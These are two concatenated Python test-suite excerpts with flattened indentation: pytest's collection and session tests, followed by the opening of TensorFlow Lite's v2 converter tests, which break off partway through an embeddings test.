result.stdout.fnmatch_lines(["*2 passed*"])
def test_pytest_fs_collect_hooks_are_seen(self, testdir):
testdir.makeconftest(
"""
import pytest
class MyModule(pytest.Module):
pass
def pytest_collect_file(path, parent):
if path.ext == ".py":
return MyModule(path, parent)
"""
)
testdir.mkdir("sub")
testdir.makepyfile("def test_x(): pass")
result = testdir.runpytest("--collect-only")
result.stdout.fnmatch_lines(["*MyModule*", "*test_x*"])
def test_pytest_collect_file_from_sister_dir(self, testdir):
sub1 = testdir.mkpydir("sub1")
sub2 = testdir.mkpydir("sub2")
conf1 = testdir.makeconftest(
"""
import pytest
class MyModule1(pytest.Module):
pass
def pytest_collect_file(path, parent):
if path.ext == ".py":
return MyModule1(path, parent)
"""
)
conf1.move(sub1.join(conf1.basename))
conf2 = testdir.makeconftest(
"""
import pytest
class MyModule2(pytest.Module):
pass
def pytest_collect_file(path, parent):
if path.ext == ".py":
return MyModule2(path, parent)
"""
)
conf2.move(sub2.join(conf2.basename))
p = testdir.makepyfile("def test_x(): pass")
p.copy(sub1.join(p.basename))
p.copy(sub2.join(p.basename))
result = testdir.runpytest("--collect-only")
result.stdout.fnmatch_lines(["*MyModule1*", "*MyModule2*", "*test_x*"])
class TestSession(object):
def test_parsearg(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
subdir = testdir.mkdir("sub")
subdir.ensure("__init__.py")
target = subdir.join(p.basename)
p.move(target)
subdir.chdir()
config = testdir.parseconfig(p.basename)
rcol = Session(config=config)
assert rcol.fspath == subdir
parts = rcol._parsearg(p.basename)
assert parts[0] == target
assert len(parts) == 1
parts = rcol._parsearg(p.basename + "::test_func")
assert parts[0] == target
assert parts[1] == "test_func"
assert len(parts) == 2
def test_collect_topdir(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
id = "::".join([p.basename, "test_func"])
# XXX migrate to collectonly? (see below)
config = testdir.parseconfig(id)
topdir = testdir.tmpdir
rcol = Session(config)
assert topdir == rcol.fspath
# rootid = rcol.nodeid
# root2 = rcol.perform_collect([rcol.nodeid], genitems=False)[0]
# assert root2 == rcol, rootid
colitems = rcol.perform_collect([rcol.nodeid], genitems=False)
assert len(colitems) == 1
assert colitems[0].fspath == p
def get_reported_items(self, hookrec):
"""Return pytest.Item instances reported by the pytest_collectreport hook"""
calls = hookrec.getcalls("pytest_collectreport")
return [
x
for call in calls
for x in call.report.result
if isinstance(x, pytest.Item)
]
def test_collect_protocol_single_function(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
id = "::".join([p.basename, "test_func"])
items, hookrec = testdir.inline_genitems(id)
(item,) = items
assert item.name == "test_func"
newid = item.nodeid
assert newid == id
pprint.pprint(hookrec.calls)
topdir = testdir.tmpdir # noqa
hookrec.assert_contains(
[
("pytest_collectstart", "collector.fspath == topdir"),
("pytest_make_collect_report", "collector.fspath == topdir"),
("pytest_collectstart", "collector.fspath == p"),
("pytest_make_collect_report", "collector.fspath == p"),
("pytest_pycollect_makeitem", "name == 'test_func'"),
("pytest_collectreport", "report.result[0].name == 'test_func'"),
]
)
# ensure we are reporting the collection of the single test item (#2464)
assert [x.name for x in self.get_reported_items(hookrec)] == ["test_func"]
def test_collect_protocol_method(self, testdir):
p = testdir.makepyfile(
"""
class TestClass(object):
def test_method(self):
pass
"""
)
normid = p.basename + "::TestClass::test_method"
for id in [p.basename, p.basename + "::TestClass", normid]:
items, hookrec = testdir.inline_genitems(id)
assert len(items) == 1
assert items[0].name == "test_method"
newid = items[0].nodeid
assert newid == normid
# ensure we are reporting the collection of the single test item (#2464)
assert [x.name for x in self.get_reported_items(hookrec)] == ["test_method"]
def test_collect_custom_nodes_multi_id(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
testdir.makeconftest(
"""
import pytest
class SpecialItem(pytest.Item):
def runtest(self):
return # ok
class SpecialFile(pytest.File):
def collect(self):
return [SpecialItem(name="check", parent=self)]
def pytest_collect_file(path, parent):
if path.basename == %r:
return SpecialFile(fspath=path, parent=parent)
"""
% p.basename
)
id = p.basename
items, hookrec = testdir.inline_genitems(id)
pprint.pprint(hookrec.calls)
assert len(items) == 2
hookrec.assert_contains(
[
("pytest_collectstart", "collector.fspath == collector.session.fspath"),
(
"pytest_collectstart",
"collector.__class__.__name__ == 'SpecialFile'",
),
("pytest_collectstart", "collector.__class__.__name__ == 'Module'"),
("pytest_pycollect_makeitem", "name == 'test_func'"),
("pytest_collectreport", "report.nodeid.startswith(p.basename)"),
]
)
assert len(self.get_reported_items(hookrec)) == 2
def test_collect_subdir_event_ordering(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
aaa = testdir.mkpydir("aaa")
test_aaa = aaa.join("test_aaa.py")
p.move(test_aaa)
items, hookrec = testdir.inline_genitems()
assert len(items) == 1
pprint.pprint(hookrec.calls)
hookrec.assert_contains(
[
("pytest_collectstart", "collector.fspath == test_aaa"),
("pytest_pycollect_makeitem", "name == 'test_func'"),
("pytest_collectreport", "report.nodeid.startswith('aaa/test_aaa.py')"),
]
)
def test_collect_two_commandline_args(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
aaa = testdir.mkpydir("aaa")
bbb = testdir.mkpydir("bbb")
test_aaa = aaa.join("test_aaa.py")
p.copy(test_aaa)
test_bbb = bbb.join("test_bbb.py")
p.move(test_bbb)
id = "."
items, hookrec = testdir.inline_genitems(id)
assert len(items) == 2
pprint.pprint(hookrec.calls)
hookrec.assert_contains(
[
("pytest_collectstart", "collector.fspath == test_aaa"),
("pytest_pycollect_makeitem", "name == 'test_func'"),
("pytest_collectreport", "report.nodeid == 'aaa/test_aaa.py'"),
("pytest_collectstart", "collector.fspath == test_bbb"),
("pytest_pycollect_makeitem", "name == 'test_func'"),
("pytest_collectreport", "report.nodeid == 'bbb/test_bbb.py'"),
]
)
def test_serialization_byid(self, testdir):
testdir.makepyfile("def test_func(): pass")
items, hookrec = testdir.inline_genitems()
assert len(items) == 1
(item,) = items
items2, hookrec = testdir.inline_genitems(item.nodeid)
(item2,) = items2
assert item2.name == item.name
assert item2.fspath == item.fspath
def test_find_byid_without_instance_parents(self, testdir):
p = testdir.makepyfile(
"""
class TestClass(object):
def test_method(self):
pass
"""
)
arg = p.basename + "::TestClass::test_method"
items, hookrec = testdir.inline_genitems(arg)
assert len(items) == 1
(item,) = items
assert item.nodeid.endswith("TestClass::test_method")
# ensure we are reporting the collection of the single test item (#2464)
assert [x.name for x in self.get_reported_items(hookrec)] == ["test_method"]
class Test_getinitialnodes(object):
def test_global_file(self, testdir, tmpdir):
x = tmpdir.ensure("x.py")
with tmpdir.as_cwd():
config = testdir.parseconfigure(x)
col = testdir.getnode(config, x)
assert isinstance(col, pytest.Module)
assert col.name == "x.py"
assert col.parent.parent is None
for col in col.listchain():
assert col.config is config
def test_pkgfile(self, testdir):
"""Verify nesting when a module is within a package.
The parent chain should match: Module<x.py> -> Package<subdir> -> Session.
Session's parent should always be None.
"""
tmpdir = testdir.tmpdir
subdir = tmpdir.join("subdir")
x = subdir.ensure("x.py")
subdir.ensure("__init__.py")
with subdir.as_cwd():
config = testdir.parseconfigure(x)
col = testdir.getnode(config, x)
assert col.name == "x.py"
assert isinstance(col, pytest.Module)
assert isinstance(col.parent, pytest.Package)
assert isinstance(col.parent.parent, pytest.Session)
# session is batman (has no parents)
assert col.parent.parent.parent is None
for col in col.listchain():
assert col.config is config
class Test_genitems(object):
def test_check_collect_hashes(self, testdir):
p = testdir.makepyfile(
"""
def test_1():
pass
def test_2():
pass
"""
)
p.copy(p.dirpath(p.purebasename + "2" + ".py"))
items, reprec = testdir.inline_genitems(p.dirpath())
assert len(items) == 4
for numi, i in enumerate(items):
for numj, j in enumerate(items):
if numj != numi:
assert hash(i) != hash(j)
assert i != j
def test_example_items1(self, testdir):
p = testdir.makepyfile(
"""
def testone():
pass
class TestX(object):
def testmethod_one(self):
pass
class TestY(TestX):
pass
"""
)
items, reprec = testdir.inline_genitems(p)
assert len(items) == 3
assert items[0].name == "testone"
assert items[1].name == "testmethod_one"
assert items[2].name == "testmethod_one"
# let's also test getmodpath here
assert items[0].getmodpath() == "testone"
assert items[1].getmodpath() == "TestX.testmethod_one"
assert items[2].getmodpath() == "TestY.testmethod_one"
s = items[0].getmodpath(stopatmodule=False)
assert s.endswith("test_example_items1.testone")
print(s)
def test_class_and_functions_discovery_using_glob(self, testdir):
"""
tests that python_classes and python_functions config options work
as prefixes and glob-like patterns (issue #600).
"""
testdir.makeini(
"""
[pytest]
python_classes = *Suite Test
python_functions = *_test test
"""
)
p = testdir.makepyfile(
"""
class MyTestSuite(object):
def x_test(self):
pass
class TestCase(object):
def test_y(self):
pass
"""
)
items, reprec = testdir.inline_genitems(p)
ids = [x.getmodpath() for x in items]
assert ids == ["MyTestSuite.x_test", "TestCase.test_y"]
def test_matchnodes_two_collections_same_file(testdir):
testdir.makeconftest(
"""
import pytest
def pytest_configure(config):
config.pluginmanager.register(Plugin2())
class Plugin2(object):
def pytest_collect_file(self, path, parent):
if path.ext == ".abc":
return MyFile2(path, parent)
def pytest_collect_file(path, parent):
if path.ext == ".abc":
return MyFile1(path, parent)
class MyFile1(pytest.Item, pytest.File):
def runtest(self):
pass
class MyFile2(pytest.File):
def collect(self):
return [Item2("hello", parent=self)]
class Item2(pytest.Item):
def runtest(self):
pass
"""
)
p = testdir.makefile(".abc", "")
result = testdir.runpytest()
assert result.ret == 0
result.stdout.fnmatch_lines(["*2 passed*"])
res = testdir.runpytest("%s::hello" % p.basename)
res.stdout.fnmatch_lines(["*1 passed*"])
class TestNodekeywords(object):
def test_no_under(self, testdir):
modcol = testdir.getmodulecol(
"""
def test_pass(): pass
def test_fail(): assert 0
"""
)
values = list(modcol.keywords)
assert modcol.name in values
for x in values:
assert not x.startswith("_")
assert modcol.name in repr(modcol.keywords)
def test_issue345(self, testdir):
testdir.makepyfile(
"""
def test_should_not_be_selected():
assert False, 'I should not have been selected to run'
def test___repr__():
pass
"""
)
reprec = testdir.inline_run("-k repr")
reprec.assertoutcome(passed=1, failed=0)
COLLECTION_ERROR_PY_FILES = dict(
test_01_failure="""
def test_1():
assert False
""",
test_02_import_error="""
import asdfasdfasdf
def test_2():
assert True
""",
test_03_import_error="""
import asdfasdfasdf
def test_3():
assert True
""",
test_04_success="""
def test_4():
assert True
""",
)
def test_exit_on_collection_error(testdir):
"""Verify that all collection errors are collected and no tests executed"""
testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
res = testdir.runpytest()
assert res.ret == 2
res.stdout.fnmatch_lines(
[
"collected 2 items / 2 errors",
"*ERROR collecting test_02_import_error.py*",
"*No module named *asdfa*",
"*ERROR collecting test_03_import_error.py*",
"*No module named *asdfa*",
]
)
def test_exit_on_collection_with_maxfail_smaller_than_n_errors(testdir):
"""
Verify collection is aborted once maxfail errors are encountered ignoring
further modules which would cause more collection errors.
"""
testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
res = testdir.runpytest("--maxfail=1")
assert res.ret == 1
res.stdout.fnmatch_lines(
["*ERROR collecting test_02_import_error.py*", "*No module named *asdfa*"]
)
assert "test_03" not in res.stdout.str()
def test_exit_on_collection_with_maxfail_bigger_than_n_errors(testdir):
"""
Verify the test run aborts due to collection errors even if maxfail count of
errors was not reached.
"""
testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
res = testdir.runpytest("--maxfail=4")
assert res.ret == 2
res.stdout.fnmatch_lines(
[
"collected 2 items / 2 errors",
"*ERROR collecting test_02_import_error.py*",
"*No module named *asdfa*",
"*ERROR collecting test_03_import_error.py*",
"*No module named *asdfa*",
]
)
def test_continue_on_collection_errors(testdir):
"""
Verify tests are executed even when collection errors occur when the
--continue-on-collection-errors flag is set
"""
testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
res = testdir.runpytest("--continue-on-collection-errors")
assert res.ret == 1
res.stdout.fnmatch_lines(
["collected 2 items / 2 errors", "*1 failed, 1 passed, 2 error*"]
)
def test_continue_on_collection_errors_maxfail(testdir):
"""
Verify tests are executed even when collection errors occur and that maxfail
is honoured (including the collection error count).
4 tests: 2 collection errors + 1 failure + 1 success
test_4 is never executed because the test run is with --maxfail=3 which
means it is interrupted after the 2 collection errors + 1 failure.
"""
testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
res = testdir.runpytest("--continue-on-collection-errors", "--maxfail=3")
assert res.ret == 1
res.stdout.fnmatch_lines(["collected 2 items / 2 errors", "*1 failed, 2 error*"])
def test_fixture_scope_sibling_conftests(testdir):
"""Regression test case for https://github.com/pytest-dev/pytest/issues/2836"""
foo_path = testdir.mkdir("foo")
foo_path.join("conftest.py").write(
textwrap.dedent(
"""\
import pytest
@pytest.fixture
def fix():
return 1
"""
)
)
foo_path.join("test_foo.py").write("def test_foo(fix): assert fix == 1")
# Tests in `food/` should not see the conftest fixture from `foo/`
food_path = testdir.mkpydir("food")
food_path.join("test_food.py").write("def test_food(fix): assert fix == 1")
res = testdir.runpytest()
assert res.ret == 1
res.stdout.fnmatch_lines(
[
"*ERROR at setup of test_food*",
"E*fixture 'fix' not found",
"*1 passed, 1 error*",
]
)
def test_collect_init_tests(testdir):
"""Check that we collect files from __init__.py files when they patch the 'python_files' (#3773)"""
p = testdir.copy_example("collect/collect_init_tests")
result = testdir.runpytest(p, "--collect-only")
result.stdout.fnmatch_lines(
[
"collected 2 items",
"<Package *",
" <Module __init__.py>",
" <Function test_init>",
" <Module test_foo.py>",
" <Function test_foo>",
]
)
result = testdir.runpytest("./tests", "--collect-only")
result.stdout.fnmatch_lines(
[
"collected 2 items",
"<Package *",
" <Module __init__.py>",
" <Function test_init>",
" <Module test_foo.py>",
" <Function test_foo>",
]
)
# Ignores duplicates with "." and pkginit (#4310).
result = testdir.runpytest("./tests", ".", "--collect-only")
result.stdout.fnmatch_lines(
[
"collected 2 items",
"<Package */tests>",
" <Module __init__.py>",
" <Function test_init>",
" <Module test_foo.py>",
" <Function test_foo>",
]
)
# Same as before, but different order.
result = testdir.runpytest(".", "tests", "--collect-only")
result.stdout.fnmatch_lines(
[
"collected 2 items",
"<Package */tests>",
" <Module __init__.py>",
" <Function test_init>",
" <Module test_foo.py>",
" <Function test_foo>",
]
)
result = testdir.runpytest("./tests/test_foo.py", "--collect-only")
result.stdout.fnmatch_lines(
["<Package */tests>", " <Module test_foo.py>", " <Function test_foo>"]
)
assert "test_init" not in result.stdout.str()
result = testdir.runpytest("./tests/__init__.py", "--collect-only")
result.stdout.fnmatch_lines(
["<Package */tests>", " <Module __init__.py>", " <Function test_init>"]
)
assert "test_foo" not in result.stdout.str()
def test_collect_invalid_signature_message(testdir):
"""Check that we issue a proper message when we can't determine the signature of a test
function (#4026).
"""
testdir.makepyfile(
"""
import pytest
class TestCase:
@pytest.fixture
def fix():
pass
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
["Could not determine arguments of *.fix *: invalid method signature"]
)
def test_collect_handles_raising_on_dunder_class(testdir):
"""Handle proxy classes like Django's LazySettings that might raise on
``isinstance`` (#4266).
"""
testdir.makepyfile(
"""
class ImproperlyConfigured(Exception):
pass
class RaisesOnGetAttr(object):
def raises(self):
raise ImproperlyConfigured
__class__ = property(raises)
raises = RaisesOnGetAttr()
def test_1():
pass
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(["*1 passed in*"])
assert result.ret == 0
def test_collect_with_chdir_during_import(testdir):
subdir = testdir.tmpdir.mkdir("sub")
testdir.tmpdir.join("conftest.py").write(
textwrap.dedent(
"""
import os
os.chdir(%r)
"""
% (str(subdir),)
)
)
testdir.makepyfile(
"""
def test_1():
import os
assert os.getcwd() == %r
"""
% (str(subdir),)
)
with testdir.tmpdir.as_cwd():
result = testdir.runpytest()
result.stdout.fnmatch_lines(["*1 passed in*"])
assert result.ret == 0
# Handles relative testpaths.
testdir.makeini(
"""
[pytest]
testpaths = .
"""
)
with testdir.tmpdir.as_cwd():
result = testdir.runpytest("--collect-only")
result.stdout.fnmatch_lines(["collected 1 item"])
def test_collect_pyargs_with_testpaths(testdir, monkeypatch):
testmod = testdir.mkdir("testmod")
# NOTE: __init__.py is not collected since it does not match python_files.
testmod.ensure("__init__.py").write("def test_func(): pass")
testmod.ensure("test_file.py").write("def test_func(): pass")
root = testdir.mkdir("root")
root.ensure("pytest.ini").write(
textwrap.dedent(
"""
[pytest]
addopts = --pyargs
testpaths = testmod
"""
)
)
monkeypatch.setenv("PYTHONPATH", str(testdir.tmpdir), prepend=os.pathsep)
with root.as_cwd():
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(["*1 passed in*"])
@pytest.mark.skipif(
not hasattr(py.path.local, "mksymlinkto"),
reason="symlink not available on this platform",
)
def test_collect_symlink_file_arg(testdir):
"""Test that collecting a direct symlink, where the target does not match python_files works (#4325)."""
real = testdir.makepyfile(
real="""
def test_nodeid(request):
assert request.node.nodeid == "real.py::test_nodeid"
"""
)
symlink = testdir.tmpdir.join("symlink.py")
symlink.mksymlinkto(real)
result = testdir.runpytest("-v", symlink)
result.stdout.fnmatch_lines(["real.py::test_nodeid PASSED*", "*1 passed in*"])
assert result.ret == 0
@pytest.mark.skipif(
not hasattr(py.path.local, "mksymlinkto"),
reason="symlink not available on this platform",
)
def test_collect_symlink_out_of_tree(testdir):
"""Test collection of symlink via out-of-tree rootdir."""
sub = testdir.tmpdir.join("sub")
real = sub.join("test_real.py")
real.write(
textwrap.dedent(
"""
def test_nodeid(request):
# Should not contain sub/ prefix.
assert request.node.nodeid == "test_real.py::test_nodeid"
"""
),
ensure=True,
)
out_of_tree = testdir.tmpdir.join("out_of_tree").ensure(dir=True)
symlink_to_sub = out_of_tree.join("symlink_to_sub")
symlink_to_sub.mksymlinkto(sub)
sub.chdir()
result = testdir.runpytest("-vs", "--rootdir=%s" % sub, symlink_to_sub)
result.stdout.fnmatch_lines(
[
# Should not contain "sub/"!
"test_real.py::test_nodeid PASSED"
]
)
assert result.ret == 0
def test_collectignore_via_conftest(testdir, monkeypatch):
"""collect_ignore in parent conftest skips importing child (issue #4592)."""
tests = testdir.mkpydir("tests")
tests.ensure("conftest.py").write("collect_ignore = ['ignore_me']")
ignore_me = tests.mkdir("ignore_me")
ignore_me.ensure("__init__.py")
ignore_me.ensure("conftest.py").write("assert 0, 'should_not_be_called'")
result = testdir.runpytest()
assert result.ret == EXIT_NOTESTSCOLLECTED
def test_collect_pkg_init_and_file_in_args(testdir):
subdir = testdir.mkdir("sub")
init = subdir.ensure("__init__.py")
init.write("def test_init(): pass")
p = subdir.ensure("test_file.py")
p.write("def test_file(): pass")
# NOTE: without "-o python_files=*.py" this collects test_file.py twice.
# This changed/broke with "Add package scoped fixtures #2283" (2b1410895)
# initially (causing a RecursionError).
result = testdir.runpytest("-v", str(init), str(p))
result.stdout.fnmatch_lines(
[
"sub/test_file.py::test_file PASSED*",
"sub/test_file.py::test_file PASSED*",
"*2 passed in*",
]
)
result = testdir.runpytest("-v", "-o", "python_files=*.py", str(init), str(p))
result.stdout.fnmatch_lines(
[
"sub/__init__.py::test_init PASSED*",
"sub/test_file.py::test_file PASSED*",
"*2 passed in*",
]
)
def test_collect_pkg_init_only(testdir):
subdir = testdir.mkdir("sub")
init = subdir.ensure("__init__.py")
init.write("def test_init(): pass")
result = testdir.runpytest(str(init))
result.stdout.fnmatch_lines(["*no tests ran in*"])
result = testdir.runpytest("-v", "-o", "python_files=*.py", str(init))
result.stdout.fnmatch_lines(["sub/__init__.py::test_init PASSED*", "*1 passed in*"])
@pytest.mark.skipif(
not hasattr(py.path.local, "mksymlinkto"),
reason="symlink not available on this platform",
)
@pytest.mark.parametrize("use_pkg", (True, False))
def test_collect_sub_with_symlinks(use_pkg, testdir):
sub = testdir.mkdir("sub")
if use_pkg:
sub.ensure("__init__.py")
sub.ensure("test_file.py").write("def test_file(): pass")
# Create a broken symlink.
sub.join("test_broken.py").mksymlinkto("test_doesnotexist.py")
# Symlink that gets collected.
sub.join("test_symlink.py").mksymlinkto("test_file.py")
result = testdir.runpytest("-v", str(sub))
result.stdout.fnmatch_lines(
[
"sub/test_file.py::test_file PASSED*",
"sub/test_symlink.py::test_file PASSED*",
"*2 passed in*",
]
)
def test_collector_respects_tbstyle(testdir):
p1 = testdir.makepyfile("assert 0")
result = testdir.runpytest(p1, "--tb=native")
assert result.ret == EXIT_INTERRUPTED
result.stdout.fnmatch_lines(
[
"*_ ERROR collecting test_collector_respects_tbstyle.py _*",
"Traceback (most recent call last):",
' File "*/test_collector_respects_tbstyle.py", line 1, in <module>',
" assert 0",
"AssertionError: assert 0",
"*! Interrupted: 1 errors during collection !*",
"*= 1 error in *",
]
)
|
|
# Lint as: python2, python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for lite.py functionality related to TensorFlow 2.0."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from absl.testing import parameterized
import numpy as np
from six.moves import range
from six.moves import zip
from tensorflow.lite.python import lite
from tensorflow.lite.python.interpreter import Interpreter
from tensorflow.python import keras
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_spec
from tensorflow.python.framework import test_util
from tensorflow.python.keras.layers import recurrent
from tensorflow.python.keras.layers import recurrent_v2
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.saved_model import save_options
from tensorflow.python.saved_model.save import save
from tensorflow.python.training.tracking import tracking
class TestModels(test_util.TensorFlowTestCase, parameterized.TestCase):
def _evaluateTFLiteModel(self, tflite_model, input_data, input_shapes=None):
"""Evaluates the model on the `input_data`.
Args:
tflite_model: TensorFlow Lite model.
input_data: List of EagerTensor const ops containing the input data for
each input tensor.
input_shapes: List of tuples representing the `shape_signature` and the
new shape of each input tensor that has unknown dimensions.
Returns:
[np.ndarray]
"""
interpreter = Interpreter(model_content=tflite_model)
input_details = interpreter.get_input_details()
if input_shapes:
for idx, (shape_signature, final_shape) in enumerate(input_shapes):
self.assertTrue(
(input_details[idx]['shape_signature'] == shape_signature).all())
interpreter.resize_tensor_input(idx, final_shape)
interpreter.allocate_tensors()
output_details = interpreter.get_output_details()
for input_tensor, tensor_data in zip(input_details, input_data):
interpreter.set_tensor(input_tensor['index'], tensor_data.numpy())
interpreter.invoke()
return [
interpreter.get_tensor(details['index']) for details in output_details
]
def _getSimpleVariableModel(self):
root = tracking.AutoTrackable()
root.v1 = variables.Variable(3.)
root.v2 = variables.Variable(2.)
root.f = def_function.function(lambda x: root.v1 * root.v2 * x)
return root
def _getMultiFunctionModel(self):
class BasicModel(tracking.AutoTrackable):
def __init__(self):
self.y = None
self.z = None
@def_function.function
def add(self, x):
if self.y is None:
self.y = variables.Variable(2.)
return x + self.y
@def_function.function
def sub(self, x):
if self.z is None:
self.z = variables.Variable(3.)
return x - self.z
return BasicModel()
def _assertValidDebugInfo(self, debug_info):
"""Verify the DebugInfo is valid."""
file_names = set()
for file_path in debug_info.files:
file_names.add(os.path.basename(file_path))
# To make the test independent on how the nodes are created, we only assert
# the name of this test file.
self.assertIn('lite_v2_test.py', file_names)
self.assertNotIn('lite_test.py', file_names)
class FromConcreteFunctionTest(TestModels):
@test_util.run_v2_only
def testTypeInvalid(self):
root = self._getSimpleVariableModel()
with self.assertRaises(ValueError) as error:
_ = lite.TFLiteConverterV2.from_concrete_functions([root.f])
self.assertIn('call from_concrete_function', str(error.exception))
@parameterized.named_parameters(
('EnableMlirConverter', True), # enable mlir
('DisableMlirConverter', False)) # disable mlir
@test_util.run_v2_only
def testFloat(self, enable_mlir):
root = self._getSimpleVariableModel()
input_data = constant_op.constant(1., shape=[1])
concrete_func = root.f.get_concrete_function(input_data)
# Convert model.
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
converter.experimental_new_converter = enable_mlir
tflite_model = converter.convert()
# Check values from converted model.
expected_value = root.f(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
self.assertEqual(expected_value.numpy(), actual_value)
@test_util.run_v2_only
def testScalarInput(self):
root = self._getSimpleVariableModel()
input_data = constant_op.constant(1., shape=[])
concrete_func = root.f.get_concrete_function(input_data)
# Convert model.
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
tflite_model = converter.convert()
# Check values from converted model.
expected_value = root.f(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
self.assertEqual(expected_value.numpy(), actual_value)
@test_util.run_v2_only
def testMultiFunctionModel(self):
"""Convert a single model in a multi-functional model."""
root = self._getMultiFunctionModel()
input_data = constant_op.constant(1., shape=[1])
concrete_func = root.add.get_concrete_function(input_data)
# Convert model and ensure model is not None.
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
tflite_model = converter.convert()
# Check values from converted model.
expected_value = root.add(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
self.assertEqual(expected_value.numpy(), actual_value)
@test_util.run_v2_only
def testConvertMultipleFunctions(self):
"""Convert multiple functions in a multi-functional model."""
root = self._getMultiFunctionModel()
input_data = constant_op.constant(1., shape=[1])
add_func = root.add.get_concrete_function(input_data)
sub_func = root.sub.get_concrete_function(input_data)
# Try converting multiple functions.
converter = lite.TFLiteConverterV2.from_concrete_functions(
[add_func, sub_func])
with self.assertRaises(ValueError) as error:
_ = converter.convert()
self.assertIn('can only convert a single ConcreteFunction',
str(error.exception))
def _getCalibrationQuantizeModel(self):
np.random.seed(0)
root = tracking.AutoTrackable()
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=[1, 5, 5, 3], dtype=dtypes.float32)
])
def func(inp):
conv = nn_ops.conv2d(
inp,
filter=array_ops.ones([3, 3, 3, 16]),
strides=[1, 1, 1, 1],
padding='SAME')
output = nn_ops.relu(conv, name='output')
return output
def calibration_gen():
for _ in range(5):
yield [np.random.uniform(-1, 1, size=(1, 5, 5, 3)).astype(np.float32)]
root.f = func
to_save = root.f.get_concrete_function()
return (to_save, calibration_gen)
def testPostTrainingCalibrateAndQuantize(self):
func, calibration_gen = self._getCalibrationQuantizeModel()
# Convert float model.
float_converter = lite.TFLiteConverterV2.from_concrete_functions([func])
float_tflite = float_converter.convert()
self.assertTrue(float_tflite)
# Convert quantized model.
quantized_converter = lite.TFLiteConverterV2.from_concrete_functions([func])
quantized_converter.optimizations = [lite.Optimize.DEFAULT]
quantized_converter.representative_dataset = calibration_gen
quantized_tflite = quantized_converter.convert()
self.assertTrue(quantized_tflite)
# The default input and output types should be float.
interpreter = Interpreter(model_content=quantized_tflite)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertLen(input_details, 1)
self.assertEqual(np.float32, input_details[0]['dtype'])
output_details = interpreter.get_output_details()
self.assertLen(output_details, 1)
self.assertEqual(np.float32, output_details[0]['dtype'])
# Ensure that the quantized weights tflite model is smaller.
self.assertLess(len(quantized_tflite), len(float_tflite))
def testCalibrateAndQuantizeBuiltinInt8(self):
func, calibration_gen = self._getCalibrationQuantizeModel()
# Convert float model.
float_converter = lite.TFLiteConverterV2.from_concrete_functions([func])
float_tflite = float_converter.convert()
self.assertTrue(float_tflite)
# Convert model by specifying target spec (instead of optimizations), since
# when targeting an integer only backend, quantization is mandatory.
quantized_converter = lite.TFLiteConverterV2.from_concrete_functions([func])
quantized_converter.target_spec.supported_ops = [
lite.OpsSet.TFLITE_BUILTINS_INT8
]
quantized_converter.representative_dataset = calibration_gen
quantized_tflite = quantized_converter.convert()
self.assertTrue(quantized_tflite)
# The default input and output types should be float.
interpreter = Interpreter(model_content=quantized_tflite)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertLen(input_details, 1)
self.assertEqual(np.float32, input_details[0]['dtype'])
output_details = interpreter.get_output_details()
self.assertLen(output_details, 1)
self.assertEqual(np.float32, output_details[0]['dtype'])
# Ensure that the quantized weights tflite model is smaller.
self.assertLess(len(quantized_tflite), len(float_tflite))
@test_util.run_v2_only
def testNewQuantizer(self):
"""Test the model quantized by the new converter."""
func, calibration_gen = self._getCalibrationQuantizeModel()
quantized_converter = lite.TFLiteConverterV2.from_concrete_functions([func])
quantized_converter.target_spec.supported_ops = [
lite.OpsSet.TFLITE_BUILTINS_INT8
]
quantized_converter.representative_dataset = calibration_gen
# default quantizer
quantized_converter.experimental_new_quantizer = False
old_tflite = quantized_converter.convert()
# new quantizer
quantized_converter.experimental_new_quantizer = True
new_tflite = quantized_converter.convert()
for _ in range(5):
input_data = constant_op.constant(
np.random.uniform(-1, 1, size=(1, 5, 5, 3)).astype(np.float32))
old_value = self._evaluateTFLiteModel(old_tflite, [input_data])
new_value = self._evaluateTFLiteModel(new_tflite, [input_data])
np.testing.assert_almost_equal(old_value, new_value, 1)
@parameterized.named_parameters(
('EnableMlirConverter', True), # enable mlir
('DisableMlirConverter', False)) # disable mlir
@test_util.run_v2_only
def testEmbeddings(self, enable_mlir):
"""Test model with embeddings."""
input_data = constant_op.constant(
np.array(np.random.random_sample((20)), dtype=np.int32))
class EmbeddingModel(keras.Model):
def __init__(self):
